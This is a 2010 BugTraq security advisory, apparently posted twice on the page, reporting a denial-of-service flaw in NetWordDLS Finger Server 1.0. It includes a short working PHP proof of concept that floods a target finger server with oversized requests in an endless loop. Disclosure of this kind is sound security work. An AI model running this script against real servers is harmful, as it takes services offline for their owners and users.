BugTraq
Back to list
|
Post reply
[DCA-0009] - NetWordDLS Finger Server Denial of Service
Aug 02 2010 09:03PM
Ewerson Guimarães (Crash) - Dclabs (crash dclabs com br)
[DCA-0009 - NetWordDLS Finger Server Denial of Service]
[Software]
- NetWordDLS Finger Server
[Vendor Product Description]
- A windows server application that reports back to users the machine
name and the current logged on user
[Bug Description]
- Server does not validate the input size leading to a Denial Of
Service flaw while sending more than 4095 characters to it.
[History]
- Advisory sent to vendor on 06/20/2010.
- No vendor response
- Advisory publised on 08/01/2010
[Impact]
- Low
[Affected Version]
- Finger Server 1.0
- Prior versions may also be vulnerable
[Vendor Reply]
[Codes]
<?php
require_once 'PEAR.php';
require_once 'Net/Socket.php';
require_once 'Net/Finger.php';
$server = $argv[1];
while (1==1) {
$data = Net_Finger::query( $server, $a = str_repeat("\x90",4095)) ;
echo $data ;
}
?>
------------------------------------------------------------------------
----------------
[Credits]
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs Security Team
www.dclabs.com.br
[Greetz]
ipax and all DcLabs members.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
[Software]
- NetWordDLS Finger Server
[Vendor Product Description]
- A windows server application that reports back to users the machine
name and the current logged on user
[Bug Description]
- Server does not validate the input size leading to a Denial Of
Service flaw while sending more than 4095 characters to it.
[History]
- Advisory sent to vendor on 06/20/2010.
- No vendor response
- Advisory publised on 08/01/2010
[Impact]
- Low
[Affected Version]
- Finger Server 1.0
- Prior versions may also be vulnerable
[Vendor Reply]
[Codes]
<?php
require_once 'PEAR.php';
require_once 'Net/Socket.php';
require_once 'Net/Finger.php';
$server = $argv[1];
while (1==1) {
$data = Net_Finger::query( $server, $a = str_repeat("\x90",4095)) ;
echo $data ;
}
?>
------------------------------------------------------------------------
----------------
[Credits]
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs Security Team
www.dclabs.com.br
[Greetz]
ipax and all DcLabs members.
[ reply ]